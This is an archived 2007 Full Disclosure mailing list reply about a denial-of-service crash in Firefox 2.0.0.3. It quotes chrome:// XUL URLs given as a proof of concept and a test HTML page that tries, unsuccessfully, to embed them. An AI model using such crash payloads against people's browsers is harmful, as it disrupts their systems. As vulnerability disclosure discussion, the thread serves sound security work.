Full Disclosure mailing list archives

Re: Firefox 2.0.0.3 DoS crash

From: Tõnu Samuel <tonu () jes ee>
Date: Fri, 20 Apr 2007 19:25:30 +0300

On Thu, 2007-04-19 at 20:22 +0200, carl hardwick wrote:

Firefox 2.0.0.3 DoS crash

PoC:
chrome://pippki/content/editcacert.xul
chrome://pippki/content/editemailcert.xul
chrome://pippki/content/editsslcert.xul


Works for me on Linux when clicking on such link.

Meanwhile I tried to embed it into webpage and did not work. 

tonu@duo:~/Desktop> cat poc.html
<html>
<body>
<img src="chrome://pippki/content/editcacert.xul" />
<iframe src="chrome://pippki/content/editcacert.xul" ></iframe>
<object src="chrome://pippki/content/editcacert.xul"
type="text/html"></object>
<script src="chrome://pippki/content/editcacert.xul" ></script>
</body>
</html>
tonu@duo:~/Desktop>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Firefox 2.0.0.3 DoS crash carl hardwick (Apr 19)
- Re: Firefox 2.0.0.3 DoS crash Tõnu Samuel (Apr 20)
- Re: Firefox 2.0.0.3 DoS crash ascii (Apr 20)